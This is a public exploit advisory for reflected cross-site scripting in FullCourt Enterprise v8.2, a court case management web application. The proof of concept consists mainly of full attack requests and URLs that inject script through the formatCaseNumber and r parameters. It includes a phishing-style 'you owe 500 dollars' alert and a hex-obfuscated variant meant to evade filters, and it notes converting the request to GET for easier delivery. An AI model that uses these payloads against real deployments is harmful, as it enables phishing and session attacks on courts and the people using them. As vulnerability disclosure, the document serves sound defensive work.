# Exploit Title: FullCourt enterprise XSS
# Date: 2023-28-12
# Exploit Author: Omar Sabagh
# Author Linkedin: https://www.linkedin.com/in/omar-s-b937791a2/
# Vendor Homepage: https://www.justicesystems.com
# Software Link: https://www.justicesystems.com/products/fullcourt-enterprise/
# Version:  FullCourt enterprise - V8.2
# CVE : CVE-2024-25327

# Summary: 
During a penetration test conducted in December of 2023, It was discovered that the full court enterprise web application was susceptible to reflected (obfuscated and unobfuscated) XSS attacks which could be injected in multiple parameters. This allows an attacker to redirect victims, create pop ups and load external resources (such as externally hosted images). 

# POC: 

XSS example 1.)

GET /fullcourtweb/courtCase.do?courtCaseBean.currentDefendantID=&formatCaseType=&formatCaseYear=2023&formatCaseNumber=0000000b9wsx%3cscript%3ealert(1)%3c%2fscript%3ec5yblw44633&retrieveAction.x=0&retrieveAction.y=0&courtCaseBean.criminalJuvenileCaseDomesticViolenceIndicator=&courtCaseBean.physicalFile=&courtCaseBean.sealed=&courtCaseBean.juryRequested=&courtCaseBean.batchLabelPrint=&courtCaseBean.juryVerdict=&courtCaseBean.citationImportCase=&doLabelSelect=false&printTrafficJacket=false&reportBean.reportMode=ledger&labelType=on HTTP/1.1

--The value of the formatCaseNumber request parameter is copied into the HTML document as plain text between tags. The payload b9wsx<script>alert(1)</script>c5yblw44633 was submitted in the formatCaseNumber parameter. This input was echoed unmodified in the application's response.

--This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

--The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

XSS example 2.)

GET /fullcourtweb/courtCase.do?courtCaseBean.currentDefendantID=&formatCaseType=&formatCaseYear=2023&formatCaseNumber=0000000vymvd%d3cscript%3ealert(1)%3c%2fscript%3erkoqwks4vtrfy0vi%3cscript%3ealert(1)%3c%2fscript%3egonoz&retrieveAction.x=0&retrieveAction.y=0&courtCaseBean.juryRequested=&courtCaseBean.batchLabelPrint=&courtCaseBean.physicalFile=&courtCaseBean.sealed=&=&doLabelSelect=false&printTrafficJacket=false&reportBean.reportMode=ledger&labelType=on HTTP/1.1

--The value of the formatCaseNumber request parameter is copied into the HTML document as plain text between tags. The payload fy0vi<script>alert(1)</script>gonoz was submitted in the formatCaseNumber parameter. This input was echoed unmodified in the application's response.

XSS example 3.)

--Unobfuscated direct URL injection
https://example-site.com/fullcourtweb/mvc/citationSearch?Index=1&r=qQDpfmw1%3C<script>alert('Bob--you owe 500 dollars,click here to resolve')</script>%3Ex5zbiql8jrw&citationNumber=12345&searchAction=

--Obfuscated direct URL injection:
https://example-site.com/fullcourtweb/mvc/citationSearch?Index=1&r=qQDpfmw1%3C%73cr%69pt%3E%61ler%74(%27%4F%77ned%20%62y%20%4Fm%61r%27)%3C%2f%73cr%69pt%3Ex5zbiql8jrw&citationNumber=53267&searchAction=

--For both examples, The value of the r request parameter is copied into the HTML document as plain text between tags. The payloads were submitted in the r parameter. This input was echoed unmodified in the application's response.